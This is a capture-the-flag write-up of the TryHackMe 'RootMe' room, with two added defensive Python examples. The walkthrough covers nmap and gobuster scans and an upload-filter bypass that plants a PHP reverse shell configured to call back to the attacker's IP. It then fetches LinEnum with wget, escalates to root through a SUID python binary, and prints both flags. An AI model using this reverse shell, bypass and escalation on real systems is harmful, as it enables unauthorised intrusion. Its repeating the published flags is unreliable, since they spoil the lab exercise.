[redraccoon] ## rootme ##
TryHackMe | Penetration Testing Basics - Red Raccoon pentesting basics practice room (tryhackme.com)
[rootme]
sudo nmap -sV 10.10.226.25 -T4
---------------------------------------------------------------------------------
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-06 23:55 EST
Nmap scan report for 10.10.226.25
Host is up (0.47s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.05 seconds
---------------------------------------------------------------------------------
sudo nmap -A 10.10.226.25 -T5 -p 22,80
---------------------------------------------------------------------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 00:07 EST
Nmap scan report for 10.10.226.25
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
| 256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_ 256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 152.60 ms 10.4.0.1
2 ... 3
4 407.76 ms 10.10.226.25
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.14 seconds
---------------------------------------------------------------------------------
# Directory brute-forcing against 'http://10.10.226.25/' using the wordlist /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://10.10.226.25/ -w /usr/share/wordlists/dirb/common.txt -f -x php -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.226.25/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php/ (Status: 403) [Size: 277]
/.htpasswd/ (Status: 403) [Size: 277]
/.htpasswd.php/ (Status: 403) [Size: 277]
/.htaccess/ (Status: 403) [Size: 277]
/.hta/ (Status: 403) [Size: 277]
/.hta.php/ (Status: 403) [Size: 277]
/.htaccess.php/ (Status: 403) [Size: 277]
Progress: 2171 / 9230 (23.52%)[ERROR] Get "http://10.10.226.25/activeCollab/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/css/ (Status: 200) [Size: 1125]
/icons/ (Status: 403) [Size: 277]
/index.php/ (Status: 200) [Size: 616]
/index.php/ (Status: 200) [Size: 616]
/js/ (Status: 200) [Size: 958]
/panel/ (Status: 200) [Size: 732]
/server-status/ (Status: 403) [Size: 277]
Progress: 7867 / 9230 (85.23%)[ERROR] Get "http://10.10.226.25/press_releases/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/uploads/ (Status: 200) [Size: 743]
Progress: 9228 / 9230 (99.98%)[ERROR] Get "http://10.10.226.25/Super-Admin/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================
# File upload page
http://10.10.226.25/panel/
# Page listing the uploaded files
http://10.10.226.25/uploads/
--------------------------------------------------------
Index of /uploads
======================================================
Name Last modified Size Description
======================================================
Parent Directory -
php-reverse-shell.php5 2024-02-07 05:43 5.4K
======================================================
Apache/2.4.29 (Ubuntu) Server at 10.10.226.25 Port 80
--------------------------------------------------------
# Locate the .php reverse shell file on kali
find / -name "*php-reverse-shell*" 2>/dev/null
--------------------------------------------------------------
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
--------------------------------------------------------------
sudo mousepad php-reverse-shell.php
----------------------------------------
$VERSION = "1.0";
$ip = '10.4.61.73'; // your own VPN IP
$port = 1234; // any port is fine
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
----------------------------------------
# Upload 'php-reverse-shell.php' through this web page
http://10.10.226.25/panel/
# The upload is rejected.
# Change the extension from php to php5 and upload again
cp php-reverse-shell.php php-reverse-shell.php5
# Listen on a port to catch the reverse shell coming from the target
nc -lvnp 1234
-----------------------------
listening on [any] 1234 ...
-----------------------------
# Open 'php-reverse-shell.php5' from this web page to execute it
http://10.10.226.25/uploads/
-----------------------------------------------------------------------------------------------
listening on [any] 1234 ...
connect to [10.4.61.73] from (UNKNOWN) [10.10.226.25] 36320
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
05:47:49 up 54 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
-----------------------------------------------------------------------------------------------
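Added example (not part of the original write-up and not the room's code): the extension denylist that let '.php5' through, beside the allowlist-plus-magic-bytes validator a defender would use instead. The extension sets, the image-only allowlist and the storage-name scheme are assumptions.

```python
import os
import re

# Constructed list: extensions Apache's PHP handler commonly executes. The room's
# filter rejected ".php" only, so ".php5" slipped through and ran as PHP.
PHP_LIKE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# Allowlist for an image-upload panel (assumption: only images are expected),
# mapping each permitted extension to the magic bytes the content must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

def weak_filter(filename: str) -> bool:
    """Denylist as observed in the room: blocks '.php' only. True = accepted."""
    return not filename.lower().endswith(".php")

def hardened_filter(filename: str, head: bytes) -> bool:
    """Allowlist filter. `head` is the first bytes of the uploaded content."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2:                       # 'a.php.png', '.htaccess' -> reject
        return False
    stem, ext = parts
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", stem):
        return False
    if ext not in ALLOWED or ext in PHP_LIKE_EXTS:
        return False
    return head.startswith(ALLOWED[ext])      # content must match the claimed type

def storage_name(filename: str) -> str:
    """Server-chosen name: random stem plus the vetted extension, never the client's name."""
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return f"{os.urandom(8).hex()}.{ext}"

# Also serve the upload directory with script execution disabled (e.g. Apache
# "php_admin_flag engine off" for /uploads) so a filter bypass still cannot run code.
```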
# Spawn a proper bash session from the limited shell with a Python one-liner
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
-------------------
www-data@rootme:/$
-------------------
# Fetch the 'LinEnum.sh' script on kali
# 'LinEnum.sh': a script that helps with information gathering and weakness discovery on Linux systems
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Serve it from kali on port 8443 (the target cannot fetch it directly, so it pulls 'LinEnum.sh' via 'kali')
python3 -m http.server 8443
# /dev/shm: volatile directory, cleared on reboot; commonly used as scratch space for temporary files during exploitation
www-data@rootme:/$ cd /dev/shm
# Fetch LinEnum.sh from 'kali'
www-data@rootme:/dev/shm$ wget http://10.4.61.73:8443/LinEnum.sh
# Grant execute permission
www-data@rootme:/dev/shm$ chmod +x ./LinEnum.sh
# Run LinEnum.sh
# /usr/bin/python has the SUID bit set.
www-data@rootme:/dev/shm$ ./LinEnum.sh
------------------------------------------------------------
[+] Possibly interesting SUID files:
-rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
------------------------------------------------------------
# Use Python to spawn a new shell; 'sh -p' keeps the effective privileges inherited from the setuid parent process instead of dropping them
# Reading the result: we are still logged in as www-data, but the effective user ID and effective group ID are root(0), so root privileges were obtained. This generally means privilege escalation was performed by exploiting a system weakness
# Reference: https://gtfobins.github.io/gtfobins/python/#suid
www-data@rootme:/$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
---------------------------------------------------------------------------------------
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
---------------------------------------------------------------------------------------
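Added example, not from the write-up or from LinEnum: a small audit that flags root-owned setuid/setgid interpreters like the /usr/bin/python found above, working both on ls-style lines (the format LinEnum prints) and on a live filesystem walk. The SHELL_CAPABLE list, the sample lines and the non-root uid placeholder are constructed assumptions.

```python
import os
import re
import stat

# Constructed: interpreters/shells that hand out a shell when run setuid root
# (the room's /usr/bin/python is one such case).
SHELL_CAPABLE = {"python", "perl", "ruby", "php", "node", "lua", "bash", "sh", "dash"}

def mode_from_ls(perm: str) -> int:
    """'-rwsr-sr-x' -> setuid/setgid bits only (other bits are irrelevant here)."""
    return (stat.S_ISUID if perm[3] in "sS" else 0) | (stat.S_ISGID if perm[6] in "sS" else 0)

def classify(path: str, mode: int, uid: int) -> str:
    """'critical' = root-owned setid interpreter, 'setid' = other setid file, 'ok' otherwise."""
    if not mode & (stat.S_ISUID | stat.S_ISGID):
        return "ok"
    stem = re.sub(r"[\d.]+$", "", os.path.basename(path))   # python3.8 -> python
    return "critical" if uid == 0 and stem in SHELL_CAPABLE else "setid"

def audit_ls_lines(lines):
    """Classify 'ls -l' style lines (e.g. LinEnum's SUID section); returns non-ok findings."""
    found = []
    for line in lines:
        f = line.split()
        if len(f) < 9 or not f[0].startswith("-"):
            continue
        uid = 0 if f[2] == "root" else -1      # placeholder: only root ownership matters
        verdict = classify(f[-1], mode_from_ls(f[0]), uid)
        if verdict != "ok":
            found.append((f[-1], verdict))
    return found

def audit_live(root="/"):
    """Same check against the real filesystem via os.lstat (run on the host under review)."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            verdict = classify(path, st.st_mode, st.st_uid) if stat.S_ISREG(st.st_mode) else "ok"
            if verdict != "ok":
                found.append((path, verdict))
    return found

# Constructed sample: the room's LinEnum finding plus two benign entries.
SAMPLE = [
    "-rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python",
    "-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd",
    "-rwxr-xr-x 1 root root 133792 Jan 18 2018 /bin/ls",
]
```

The fix for the finding above is to clear the bits (chmod u-s,g-s /usr/bin/python); audit_live('/') must run on the host being checked.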
# find / -name "user.txt" 2>/dev/null
------------------------------------
find / -name "user.txt" 2>/dev/null
/var/www/user.txt
------------------------------------
# cat /var/www/user.txt
-----------------------
cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}
-----------------------
# find / -name "root.txt" 2>/dev/null
------------------------------------
find / -name "root.txt" 2>/dev/null
/root/root.txt
------------------------------------
# cat /root/root.txt
--------------------------
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}
--------------------------